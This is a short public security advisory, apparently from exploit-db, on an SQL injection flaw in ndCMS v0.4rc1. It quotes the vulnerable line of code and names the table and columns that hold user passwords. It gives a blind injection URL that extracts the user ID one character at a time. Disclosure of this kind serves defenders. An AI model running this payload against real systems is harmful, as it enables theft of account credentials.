'''
________ __ ____
|\/|/ __ \ /\| || |_ \
| \/ | || | /\ | || | |_) |
| |\/| | || |/ /\ \| || |_ <
| || | |__| / ____ \ |__| | |_) |
|_||_|\____/_/\_\____/|____/
http://www.exploit-db.com/moaub-27-ndcms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title:ndCMS Sql Injection Vulnerability
Affected Version :ndCMS(Nickel and Dime CMS) v0.4rc1
Discovery:www.abysssec.com
Download Links :http://souurceforge.net/projects/ndcms-net
Login Page :http://localhost/ndcms/admin/?Mode=Express&indx=
Description :
===========================================================================================
This version of ndCMS has Sql Injection Vulnerability that its DataBase is Access
withTable of Users : tblUSERS
Columns : userid , passwd.
Vulnerable Code:
.../express_edit/editor.aspx
Ln 65:
dbr = db.ExecuteReader("Select * from tblPAGES WHERE indx=" + Request.Params["indx"]);
Considering to the code, for example you can browse this URL:
http://Example.com/express_edit/editor.aspx?index=1+AND+1=IIF((select mid(last(userid),1,1) from (select top 1 userid from tblUSERS))='a',1,2)
and so on.
===========================================================================================